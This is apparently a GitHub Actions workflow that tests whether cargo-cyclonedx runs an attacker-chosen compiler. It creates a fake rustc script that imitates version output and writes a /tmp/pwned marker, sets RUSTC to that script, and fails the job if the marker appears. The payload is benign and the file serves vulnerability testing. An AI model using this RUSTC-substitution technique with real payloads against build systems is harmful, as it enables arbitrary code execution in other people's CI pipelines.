name: Test Cargo CycloneDX RUSTC Injection

on: [push, pull_request]

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout Code
        uses: actions/checkout@v4

      - name: Set up Rust
        uses: actions-rs/toolchain@v1
        with:
          toolchain: stable

      - name: Cache Cargo Dependencies
        uses: actions/cache@v2
        with:
          path: |
            ~/.cargo/registry
            ~/.cargo/git
            target
          key: ${{ runner.os }}-cargo-${{ hashFiles('**/Cargo.lock') }}

      - name: Install Cargo CycloneDX
        run: cargo install cargo-cyclonedx

      - name: Ensure Cargo Project Exists
        run: |
          if [ ! -f Cargo.toml ]; then
            echo "🚨 Cargo.toml not found! Initializing a dummy project..."
            cargo init --name testrepo
          fi

      - name: Generate SBOM (Test Exploit)
        run: |
          echo '#!/bin/bash' > fake_rustc
          echo 'if [[ "$*" == *"--print=file-names"* ]]; then' >> fake_rustc
          echo '    echo "libtest.rlib"' >> fake_rustc
          echo 'else' >> fake_rustc
          echo '    echo "rustc 1.72.0 (123456789 2024-01-01)"' >> fake_rustc
          echo '    echo "binary: rustc"' >> fake_rustc
          echo '    echo "commit-hash: 123456789abcdef"' >> fake_rustc
          echo '    echo "commit-date: 2024-01-01"' >> fake_rustc
          echo '    echo "host: x86_64-unknown-linux-gnu"' >> fake_rustc
          echo '    echo "release: 1.72.0"' >> fake_rustc
          echo '    echo "LLVM version: 16.0.6"' >> fake_rustc
          echo 'fi' >> fake_rustc
          echo 'touch /tmp/pwned' >> fake_rustc
          chmod +x fake_rustc
          
          export RUSTC=./fake_rustc
          cargo cyclonedx --verbose || true  # Prevents CI failure

      - name: Check if Exploit Worked
        run: |
          if [ -f /tmp/pwned ]; then
            echo "🔥 Exploit SUCCESSFUL: Arbitrary command executed"
            exit 1  # Fail the job to indicate the vulnerability exists
          else
            echo "❌ Exploit FAILED: No command execution detected"
            exit 0  # Pass the job if no exploit was detected
          fi
